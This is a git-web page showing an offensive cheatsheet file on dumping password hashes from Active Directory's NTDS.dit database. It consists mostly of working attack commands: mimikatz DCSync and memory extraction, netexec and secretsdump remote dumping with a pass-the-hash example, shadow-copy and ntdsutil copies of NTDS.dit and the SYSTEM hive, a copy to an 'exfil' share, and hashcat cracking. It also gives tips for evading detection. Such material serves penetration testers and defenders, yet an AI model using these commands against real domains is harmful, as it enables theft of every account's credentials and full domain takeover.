daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-adds-ntds-dumping.md (9545B)


      1 ---
      2 title: "Active Directory - NTDS Dumping"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-adds-ntds-dumping.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adds-ntds-dumping.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - NTDS Dumping
     12 
     13 You will need the following files to extract the ntds :
     14 
     15 - NTDS.dit file
     16 - SYSTEM hive (`C:\Windows\System32\SYSTEM`)
     17 
     18 Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`.
     19 
     20 - `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data).
     21 - `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD.
     22 
     23 However you can change the location to a custom one, you will need to query the registry to get the current location.
     24 
     25 ```powershell
     26 reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file"
     27 ```
     28 
     29 ## DCSync Attack
     30 
     31 DCSync is a technique used by attackers to obtain sensitive information, including password hashes, from a domain controller in an Active Directory environment. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data.
     32 
     33 - DCSync only one user
     34 
     35   ```powershell
     36   mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
     37   ```
     38 
     39 - DCSync all users of the domain
     40 
     41   ```powershell
     42   mimikatz# lsadump::dcsync /domain:htb.local /all /csv
     43 
     44   netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds
     45   netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi
     46   ```
     47 
     48 > :warning: OPSEC NOTE: Replication is always done between 2 Computers. Doing a DCSync from a user account can raise alerts.
     49 
     50 ## Volume Shadow Copy
     51 
     52 The VSS is a Windows service that allows users to create snapshots or backups of their data at a specific point in time. Attackers can abuse this service to access and copy sensitive data, even if it is currently being used or locked by another process.
     53 
     54 - [windows-commands/vssadmin](https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/vssadmin)
     55 
     56   ```powershell
     57   vssadmin create shadow /for=C:
     58   copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
     59   copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
     60   ```
     61 
     62 - [windows-commands/ntdsutil](https://learn.microsoft.com/fr-fr/troubleshoot/windows-server/identity/use-ntdsutil-manage-ad-files)
     63 
     64   ```powershell
     65   ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
     66   ```
     67 
     68 - [Pennyw0rth/NetExec](https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-ntds.dit) - VSS module
     69 
     70   ```powershell
     71   nxc smb 10.10.0.202 -u username -p password --ntds vss
     72   ```
     73 
     74 Alternate way to access a VSS snapshot in GUI:
     75 
     76 - Select a snapshot, go to "Previous Versions" tab
     77 - See the properties and recover the path in this format `@GMT-yyyy.MM.dd-HH.mm.ss`
     78 
     79   ```ps1
     80   Y:\@GMT-2025.07.10-13.05.00
     81   ```
     82 
     83 ## Forensic Tools
     84 
     85 A good method for avoiding or reducing detections involves using common forensic tools to dump the NTDS.dit file and the SYSTEM hive. By utilizing widely recognized and legitimate forensic software, the process can be conducted more discreetly and with a lower risk of triggering security alerts.
     86 
     87 - Dump the memory with [magnet/dumpit](https://www.magnetforensics.com/resources/magnet-dumpit-for-windows/)
     88 - Use volatility to extract the `SYSTEM` hive
     89 
     90   ```ps1
     91   volatility -f test.raw windows.registry.printkey.PrintKey
     92   volatility --profile=Win10x64_14393 dumpregistry -o 0xaf0287e41000 -D output_vol -f test.raw
     93   ```
     94 
     95 - Use [exterro/ftk-imager](https://www.exterro.com/digital-forensics-software/ftk-imager) to read the disk in raw state
     96     - Go to `File` -> `Add Evidence Item` -> `Physical Drive` -> `Select the C drive`.
     97     - Export `C:\Windows\NTDS\ntds.dit`.
     98 - Finally use secretdump: `secretsdump.py LOCAL -system output_vol/registry.0xaf0287e41000.SYSTEM.reg -ntds ntds.dit`
     99 
    100 ## Extract hashes from ntds.dit
    101 
    102 Then you need to use [impacket/secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) to extract the hashes, use the `LOCAL` options to use it on a retrieved ntds.dit
    103 
    104 ```java
    105 secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
    106 ```
    107 
    108 [secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) also works remotely
    109 
    110 ```java
    111 ./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss -pwd-last-set -user-status 
    112 ./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
    113 ```
    114 
    115 - `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account.
    116 - `-user-status`: Display whether or not the user is disabled.
    117 
    118 ## Extract hashes from adamntds.dit
    119 
    120 In AD LDS stores the data inside a dit file located at `C:\Program Files\Microsoft ADAM\instance1\data\adamntds.dit`.
    121 
    122 - Dump adamntds.dit with Shadow copy using `vssadmin.exe`
    123 
    124     ```ps1
    125     vssadmin.exe create shadow /For=C:
    126     cp "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Program files\Microsoft ADAM\instance1\data\adamntds.dit" \\exfil\data\adamntds.dit
    127     ```
    128 
    129 - Dump adamntds.dit with Windows Server Backup using `wbadmin.exe`
    130 
    131     ```ps1
    132     wbadmin.exe start backup -backupTarget:e: -vssCopy -include:"C:\Program Files\Microsoft ADAM\instance1\data\adamntds.dit"
    133     wbadmin.exe start recovery -version:08/04/2023-12:59 -items:"c:\Program Files\Microsoft ADAM\instance1\data\adamntds.dit" -itemType:File -recoveryTarget:C:\Users\Administrator\Desktop\ -backupTarget:e:
    134     ```
    135 
    136 - Extract hashes with [synacktiv/ntdissector](https://github.com/synacktiv/ntdissector)
    137 
    138     ```ps1
    139     ntdissector path/to/adamntds.dit
    140     python ntdissector/tools/user_to_secretsdump.py path/to/output/*.json
    141     ```
    142 
    143 ## Crack NTLM hashes with hashcat
    144 
    145 Useful when you want to have the clear text password or when you need to make stats about weak passwords.
    146 
    147 Recommended wordlists:
    148 
    149 - [Rockyou.txt](https://weakpass.com/wordlist/90)
    150 - [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM))
    151 - [Weakpass.com](https://weakpass.com/)
    152 - Read More at [Methodology and Resources/Hash Cracking.md](/internal/cheatsheets/hash-cracking)
    153 
    154 ```powershell
    155 # Basic wordlist
    156 # (-O) will Optimize for 32 characters or less passwords
    157 # (-w 4) will set the workload to "Insane" 
    158 $ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r myrules.rule --opencl-device-types 1,2
    159 
    160 # Generate a custom mask based on a wordlist
    161 $ git clone https://github.com/iphelix/pack/blob/master/README
    162 $ python2 statsgen.py ../hashcat.potfile -o hashcat.mask
    163 $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.hcmask
    164 ```
    165 
    166 :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
    167 
    168 - [hashmob.net](https://hashmob.net)
    169 - [crackstation.net](https://crackstation.net)
    170 - [hashes.com](https://hashes.com/en/decrypt/hash)
    171 
    172 ## NTDS Reversible Encryption
    173 
    174 `UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED` ([0x00000080](http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm)), if this bit is set, the password for this user stored encrypted in the directory - but in a reversible form.
    175 
    176 The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin.
    177 This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”.
    178 
    179 - List users with "Store passwords using reversible encryption" enabled
    180 
    181     ```powershell
    182     Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
    183     ```
    184 
    185 The password retrieval is already handled by [SecureAuthCorp/secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) and mimikatz, it will be displayed as CLEARTEXT.
    186 
    187 ## Extract hashes from memory
    188 
    189 Dumps credential data in an Active Directory domain when run on a Domain Controller.
    190 
    191 :warning: Requires administrator access with debug privilege or NT-AUTHORITY\SYSTEM account.
    192 
    193 ```powershell
    194 mimikatz> privilege::debug
    195 mimikatz> sekurlsa::krbtgt
    196 mimikatz> lsadump::lsa /inject /name:krbtgt
    197 ```
    198 
    199 ## References
    200 
    201 - [Bypassing EDR NTDS.dit protection using BlueTeam tools - bilal al-qurneh - June 9, 2024](https://medium.com/@0xcc00/bypassing-edr-ntds-dit-protection-using-blueteam-tools-1d161a554f9f)
    202 - [Diskshadow The Return Of VSS Evasion Persistence And AD Db Extraction - bohops - March 26, 2018](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)
    203 - [Dumping Domain Password Hashes - Pentestlab - July 4, 2018](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/)
    204 - [Using Ntdissector To Extract Secrets From Adam Ntds Files - Julien Legras, Mehdi Elyassa - December 06, 2023](https://www.synacktiv.com/publications/using-ntdissector-to-extract-secrets-from-adam-ntds-files)